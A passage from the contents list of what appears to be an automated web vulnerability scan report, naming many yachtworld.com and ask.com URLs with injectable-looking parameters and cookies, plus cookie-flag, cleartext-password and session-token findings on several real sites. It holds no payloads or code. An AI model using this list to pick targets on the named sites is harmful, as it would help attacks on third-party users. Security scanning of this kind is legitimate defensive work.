3.291. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 4]

3.292. http://www.yachtworld.com/boats/category/type/Wellcraft/1 [REST URL parameter 5]

3.293. http://www.yachtworld.com/boats/category/type/builder/ [REST URL parameter 3]

3.294. http://www.yachtworld.com/boats/category/type/builder/ [REST URL parameter 4]

3.295. http://www.yachtworld.com/boats/category/type/builder/model/United+States [REST URL parameter 6]

3.296. http://www.yachtworld.com/boats/category/type/builder/model/United+States [name of an arbitrarily supplied request parameter]

3.297. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ [REST URL parameter 6]

3.298. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ [name of an arbitrarily supplied request parameter]

3.299. http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1 [name of an arbitrarily supplied request parameter]

3.300. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1 [name of an arbitrarily supplied request parameter]

3.301. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1 [name of an arbitrarily supplied request parameter]

3.302. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1 [name of an arbitrarily supplied request parameter]

3.303. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1 [name of an arbitrarily supplied request parameter]

3.304. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1 [name of an arbitrarily supplied request parameter]

3.305. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1 [name of an arbitrarily supplied request parameter]

3.306. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1 [name of an arbitrarily supplied request parameter]

3.307. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1 [name of an arbitrarily supplied request parameter]

3.308. http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1 [name of an arbitrarily supplied request parameter]

3.309. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1 [name of an arbitrarily supplied request parameter]

3.310. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1 [name of an arbitrarily supplied request parameter]

3.311. http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1 [name of an arbitrarily supplied request parameter]

3.312. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1 [name of an arbitrarily supplied request parameter]

3.313. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 [REST URL parameter 6]

3.314. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 [name of an arbitrarily supplied request parameter]

3.315. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1 [name of an arbitrarily supplied request parameter]

3.316. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 [REST URL parameter 6]

3.317. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 [name of an arbitrarily supplied request parameter]

3.318. http://www.yachtworld.com/clarkslanding/clarkslanding_1.cgi [hosturl parameter]

3.319. http://www.yachtworld.com/clarkslanding/clarkslanding_1.cgi [hosturl parameter]

3.320. http://www.yachtworld.com/clarkslanding/clarkslanding_2.cgi [hosturl parameter]

3.321. http://www.yachtworld.com/clarkslanding/clarkslanding_2.cgi [hosturl parameter]

3.322. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter]

3.323. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter]

3.324. http://www.yachtworld.com/clarkslanding/clarkslanding_3.cgi [hosturl parameter]

3.325. http://www.yachtworld.com/clarkslanding/email.cgi [office_id parameter]

3.326. http://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter]

3.327. http://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter]

3.328. http://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter]

3.329. http://www.yachtworld.com/core/listing/advancedSearch.jsp [No parameter]

3.330. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromLength parameter]

3.331. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromPrice parameter]

3.332. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromYear parameter]

3.333. http://www.yachtworld.com/core/listing/advancedSearch.jsp [man parameter]

3.334. http://www.yachtworld.com/core/listing/advancedSearch.jsp [man parameter]

3.335. http://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter]

3.336. http://www.yachtworld.com/core/listing/advancedSearch.jsp [sm parameter]

3.337. http://www.yachtworld.com/core/listing/advancedSearch.jsp [toLength parameter]

3.338. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [boat_id parameter]

3.339. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [name of an arbitrarily supplied request parameter]

3.340. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [url parameter]

3.341. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [url parameter]

3.342. http://www.yachtworld.com/core/listing/cache/dimensionValues.jsp [N parameter]

3.343. http://www.yachtworld.com/core/listing/cache/dimensionValues.jsp [Ne parameter]

3.344. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&lineonly&&type parameter]

3.345. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&type parameter]

3.346. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&ywo parameter]

3.347. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&ywo parameter]

3.348. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter]

3.349. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter]

3.350. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [hosturl parameter]

3.351. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [slim parameter]

3.352. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [so parameter]

3.353. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [type parameter]

3.354. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [url parameter]

3.355. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [url parameter]

3.356. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [ywo parameter]

3.357. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [ywo parameter]

3.358. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]

3.359. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]

3.360. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [No parameter]

3.361. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.362. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.363. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.364. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [Ntt parameter]

3.365. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [cint parameter]

3.366. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter]

3.367. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter]

3.368. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [city parameter]

3.369. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter]

3.370. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromLength parameter]

3.371. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromLength parameter]

3.372. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.373. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.374. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.375. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [fromYear parameter]

3.376. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter]

3.377. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter]

3.378. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [is parameter]

3.379. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [is parameter]

3.380. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter]

3.381. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter]

3.382. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter]

3.383. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.384. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.385. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.386. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.387. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [man parameter]

3.388. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]

3.389. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]

3.390. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [pbsint parameter]

3.391. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [resultsLayout parameter]

3.392. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [rid parameter]

3.393. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]

3.394. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]

3.395. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toLength parameter]

3.396. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toLength parameter]

3.397. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toYear parameter]

3.398. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toYear parameter]

3.399. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter]

3.400. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter]

3.401. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter]

3.402. http://www.yachtworld.com/core/listing/displayPhoto.jsp [back parameter]

3.403. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boat_id parameter]

3.404. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter]

3.405. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter]

3.406. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatname parameter]

3.407. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatyr parameter]

3.408. http://www.yachtworld.com/core/listing/displayPhoto.jsp [boatyr parameter]

3.409. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter]

3.410. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter]

3.411. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_name parameter]

3.412. http://www.yachtworld.com/core/listing/displayPhoto.jsp [photo_revised_date parameter]

3.413. http://www.yachtworld.com/core/listing/photoGallery.jsp [boat_id parameter]

3.414. http://www.yachtworld.com/core/listing/photoGallery.jsp [boat_id parameter]

3.415. http://www.yachtworld.com/core/listing/photoGallery.jsp [currency parameter]

3.416. http://www.yachtworld.com/core/listing/photoGallery.jsp [name of an arbitrarily supplied request parameter]

3.417. http://www.yachtworld.com/core/listing/photoGallery.jsp [units parameter]

3.418. http://www.yachtworld.com/core/listing/photo_gallery.jsp [boat_id parameter]

3.419. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter]

3.420. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter]

3.421. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter]

3.422. http://www.yachtworld.com/core/listing/photo_gallery.jsp [slim parameter]

3.423. http://www.yachtworld.com/core/listing/photo_gallery.jsp [units parameter]

3.424. http://www.yachtworld.com/core/listing/photo_gallery.jsp [ywo parameter]

3.425. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.426. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.427. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.428. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.429. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&hosturl parameter]

3.430. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&units parameter]

3.431. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter]

3.432. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter]

3.433. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [&ywo parameter]

3.434. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [checked_boats parameter]

3.435. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.436. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.437. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.438. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.439. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [hosturl parameter]

3.440. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [id parameter]

3.441. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [name of an arbitrarily supplied request parameter]

3.442. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter]

3.443. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter]

3.444. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter]

3.445. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [units parameter]

3.446. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter]

3.447. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter]

3.448. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter]

3.449. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

3.450. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

3.451. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]

3.452. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.453. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.454. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.455. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.456. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]

3.457. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

3.458. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

3.459. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]

3.460. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]

3.461. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [&ywo parameter]

3.462. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [&ywo parameter]

3.463. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.464. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.465. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.466. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.467. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter]

3.468. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [name of an arbitrarily supplied request parameter]

3.469. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter]

3.470. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter]

3.471. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter]

3.472. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [url parameter]

3.473. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [url parameter]

3.474. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [&hosturl parameter]

3.475. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [&hosturl parameter]

3.476. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [Regulator+32+FS&photo_name parameter]

3.477. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [boat_id parameter]

3.478. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [boatname parameter]

3.479. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [hosturl parameter]

3.480. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [hosturl parameter]

3.481. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [name of an arbitrarily supplied request parameter]

3.482. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [photo_name parameter]

3.483. http://www.yachtworld.com/core/listing/video_gallery.jsp [&ybw parameter]

3.484. http://www.yachtworld.com/core/listing/video_gallery.jsp [&ywo parameter]

3.485. http://www.yachtworld.com/core/listing/video_gallery.jsp [boat_id parameter]

3.486. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter]

3.487. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter]

3.488. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter]

3.489. http://www.yachtworld.com/core/rendering/email-boat.htm [boatId parameter]

3.490. http://www.yachtworld.com/core/rendering/email-boat.htm [boatUrl parameter]

3.491. http://www.yachtworld.com/core/rendering/email-boat.htm [officeId parameter]

3.492. http://www.yachtworld.com/core/rendering/email-boat.htm [officeId parameter]

3.493. http://www.yachtworld.com/core/rendering/email-boat.htm [units parameter]

3.494. http://www.yachtworld.com/core/rendering/email-boat.htm [units parameter]

3.495. http://www.yachtworld.com/core/rendering/email-boat.htm [url parameter]

3.496. http://www.yachtworld.com/core/rendering/print-boat.htm [boatId parameter]

3.497. http://www.yachtworld.com/core/rendering/print-boat.htm [officeId parameter]

3.498. http://www.yachtworld.com/core/rendering/print-boat.htm [url parameter]

3.499. http://www.yachtworld.com/core/sponsored-boats/search.htm [name of an arbitrarily supplied request parameter]

3.500. http://www.yachtworld.com/donnellyyachts/donnellyyachts_2.cgi [hosturl parameter]

3.501. http://www.yachtworld.com/donnellyyachts/donnellyyachts_2.cgi [hosturl parameter]

3.502. http://www.yachtworld.com/jarrettbay/email.cgi [office_id parameter]

3.503. http://www.yachtworld.com/jerseymarine/email.cgi [office_id parameter]

3.504. http://www.yachtworld.com/jerseymarine/jerseymarine_2.cgi [hosturl parameter]

3.505. http://www.yachtworld.com/jerseymarine/jerseymarine_2.cgi [hosturl parameter]

3.506. http://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.507. http://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.508. http://www.yachtworld.com/legendary/email.cgi [office_id parameter]

3.509. http://www.yachtworld.com/marinemaxcarolinas/email.cgi [office_id parameter]

3.510. http://www.yachtworld.com/marinemaxcarolinas/marinemaxcarolinas_2.cgi [hosturl parameter]

3.511. http://www.yachtworld.com/marinemaxcarolinas/marinemaxcarolinas_2.cgi [hosturl parameter]

3.512. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [currencyid parameter]

3.513. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [slim parameter]

3.514. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [sm parameter]

3.515. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [so parameter]

3.516. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

3.517. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

3.518. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

3.519. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]

3.520. http://www.yachtworld.com/southpaw/email.cgi [office_id parameter]

3.521. http://www.yachtworld.com/southpaw/southpaw_1.cgi [hosturl parameter]

3.522. http://www.yachtworld.com/southpaw/southpaw_1.cgi [hosturl parameter]

3.523. http://www.yachtworld.com/starlingmarine/email.cgi [office_id parameter]

3.524. http://www.yachtworld.com/starlingmarine/starlingmarine_1.cgi [hosturl parameter]

3.525. http://www.yachtworld.com/starlingmarine/starlingmarine_1.cgi [hosturl parameter]

3.526. https://www.yachtworld.com/core/cached/includes/css/stylesheet-intl.css [11.4-Build-105&locale parameter]

3.527. https://www.yachtworld.com/core/globalnav/emailForm.jsp [refer_page parameter]

3.528. https://www.yachtworld.com/core/globalnav/emailForm.jsp [send_to parameter]

3.529. https://www.yachtworld.com/core/listing/advancedSearch.jsp [name of an arbitrarily supplied request parameter]

3.530. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [N parameter]

3.531. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [enid parameter]

3.532. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter]

3.533. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter]

3.534. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter]

3.535. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter]

3.536. https://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.537. https://www.yachtworld.com/leaving_yw.cgi [url parameter]

3.538. http://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header]

3.539. https://www.yachtworld.com/leaving_yw.cgi [Referer HTTP header]

3.540. http://www.ask.com/ [wz_uid cookie]

3.541. http://www.ask.com/about [user cookie]

3.542. http://www.ask.com/about [wz_sid cookie]

3.543. http://www.ask.com/about [wz_uid cookie]

3.544. http://www.ask.com/about/legal/privacy [wz_sid cookie]

3.545. http://www.ask.com/about/legal/privacy [wz_uid cookie]

3.546. http://www.ask.com/about/legal/terms [wz_sid cookie]

3.547. http://www.ask.com/about/legal/terms [wz_uid cookie]

3.548. http://www.ask.com/advertise [wz_sid cookie]

3.549. http://www.ask.com/advertise [wz_uid cookie]

3.550. http://www.ask.com/ans [wz_uid cookie]

3.551. http://www.ask.com/answers [wz_sid cookie]

3.552. http://www.ask.com/answers [wz_uid cookie]

3.553. http://www.ask.com/answers/000/Notification [wz_sid cookie]

3.554. http://www.ask.com/answers/000/Notification [wz_uid cookie]

3.555. http://www.ask.com/blogsearch [wz_uid cookie]

3.556. http://www.ask.com/homepage [wz_uid cookie]

3.557. http://www.ask.com/jsignin [wz_sid cookie]

3.558. http://www.ask.com/jsignin [wz_uid cookie]

3.559. http://www.ask.com/more [wz_uid cookie]

3.560. http://www.ask.com/pictures [user cookie]

3.561. http://www.ask.com/pictures [wz_sid cookie]

3.562. http://www.ask.com/pictures [wz_sid cookie]

3.563. http://www.ask.com/pictures [wz_uid cookie]

3.564. http://www.ask.com/pictures [wz_uid cookie]

3.565. http://www.ask.com/pictureslanding [user cookie]

3.566. http://www.ask.com/pictureslanding [wz_sid cookie]

3.567. http://www.ask.com/pictureslanding [wz_uid cookie]

3.568. http://www.ask.com/questionoftheday [wz_sid cookie]

3.569. http://www.ask.com/questionoftheday [wz_uid cookie]

3.570. http://www.ask.com/settings [wz_sid cookie]

3.571. http://www.ask.com/settings [wz_uid cookie]

3.572. http://www.ask.com/video [wz_uid cookie]

3.573. http://www.ask.com/videos [wz_sid cookie]

3.574. http://www.ask.com/videos [wz_uid cookie]

3.575. http://www.ask.com/web [wz_sid cookie]

3.576. http://www.ask.com/web [wz_uid cookie]

3.577. http://www.ask.com/web [wz_uid cookie]

3.578. http://www.ask.com/web [wz_uid cookie]

4. Cleartext submission of password

4.1. http://malsup.com/jquery/form/

4.2. http://malsup.com/jquery/form/

4.3. http://malsup.com/jquery/form/

4.4. http://malsup.com/jquery/form/

4.5. http://malsup.com/jquery/form/

4.6. http://malsup.com/jquery/form/

4.7. http://www.ask.com/ja-ask-dialog

4.8. http://www.ask.com/jsignin

4.9. http://www.ask.com/settings

4.10. http://www.dynamicdrive.com/forums/showthread.php

4.11. http://www.reel-time.com/forum/showthread.php

5. SSL cookie without secure flag set

5.1. https://www.linkedin.com/secure/login

5.2. https://www.yachtworld.com/boat-loans/index.jsp

5.3. https://www.yachtworld.com/

5.4. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

5.5. https://www.yachtworld.com/boat-loans/forgot_password.jsp

5.6. https://www.yachtworld.com/boat-loans/myLoan.jsp

6. Session token in URL

6.1. http://www.ask.com/ans

6.2. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

7. Password field submitted using GET method

7.1. http://www.ask.com/ja-ask-dialog

7.2. http://www.ask.com/ja-ask-dialog

7.3. http://www.ask.com/settings

8. Cookie scoped to parent domain

8.1. http://www.boats.com/boat-transport/index.jsp

8.2. http://www.boats.com/boat-transport/index.jsp

8.3. http://www.boats.com/includes/script_declarations.jsp

8.4. http://ads.pointroll.com/PortalServe/

8.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052

8.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539

8.7. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015

8.8. http://www.ask.com/

8.9. http://www.ask.com/

8.10. http://www.ask.com/about

8.11. http://www.ask.com/about/legal/privacy

8.12. http://www.ask.com/about/legal/terms

8.13. http://www.ask.com/advertise

8.14. http://www.ask.com/ans

8.15. http://www.ask.com/answers

8.16. http://www.ask.com/answers/000/Notification

8.17. http://www.ask.com/homepage

8.18. http://www.ask.com/ja-ask-dialog

8.19. http://www.ask.com/pictures

8.20. http://www.ask.com/pictureslanding

8.21. http://www.ask.com/questionoftheday

8.22. http://www.ask.com/settings

8.23. http://www.ask.com/skins

8.24. http://www.ask.com/videos

8.25. http://www.ask.com/web

8.26. http://www.ask.com/webadvanced

8.27. https://www.linkedin.com/secure/login

8.28. http://www.reel-time.com/forum/showthread.php

8.29. http://wzus1.ask.com/i/i.gif

9. Cookie without HttpOnly flag set

9.1. http://www.boats.com/boat-transport/index.jsp

9.2. http://www.boats.com/boat-transport/index.jsp

9.3. http://www.boats.com/includes/script_declarations.jsp

9.4. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

9.5. https://www.linkedin.com/secure/login

9.6. http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp

9.7. http://www.yachtworld.com/boat-loans/finance/rates.jsp

9.8. http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp

9.9. http://www.yachtworld.com/boat-loans/index.jsp

9.10. http://www.yachtworld.com/boat-loans/partner_program.jsp

9.11. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

9.12. https://www.yachtworld.com/boat-loans/forgot_password.jsp

9.13. https://www.yachtworld.com/boat-loans/index.jsp

9.14. https://www.yachtworld.com/boat-loans/myLoan.jsp

9.15. http://ads.pointroll.com/PortalServe/

9.16. http://govguru.com/north-carolina/boat-registration

9.17. http://hire.jobvite.com/CompanyJobs/Careers.aspx

9.18. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052

9.19. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539

9.20. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015

9.21. http://www.ask.com/

9.22. http://www.ask.com/

9.23. http://www.ask.com/about

9.24. http://www.ask.com/about/legal/privacy

9.25. http://www.ask.com/about/legal/terms

9.26. http://www.ask.com/advertise

9.27. http://www.ask.com/ans

9.28. http://www.ask.com/answers

9.29. http://www.ask.com/answers/000/Notification

9.30. http://www.ask.com/homepage

9.31. http://www.ask.com/ja-ask-dialog

9.32. http://www.ask.com/pictures

9.33. http://www.ask.com/pictureslanding

9.34. http://www.ask.com/questionoftheday

9.35. http://www.ask.com/settings

9.36. http://www.ask.com/skins

9.37. http://www.ask.com/videos

9.38. http://www.ask.com/web

9.39. http://www.ask.com/webadvanced

9.40. http://www.boatxchange.com/openx/www/delivery/ajs.php

9.41. http://www.boatxchange.com/openx/www/delivery/lg.php

9.42. http://www.dynamicdrive.com/forums/showthread.php

9.43. http://www.reel-time.com/forum/showthread.php

9.44. http://www.yachtworld.com/

9.45. http://www.yachtworld.com/

9.46. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

9.47. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

9.48. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

9.49. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

9.50. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

9.51. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

9.52. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

9.53. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

9.54. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

9.55. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States

9.56. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

9.57. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States

9.58. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States

9.59. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

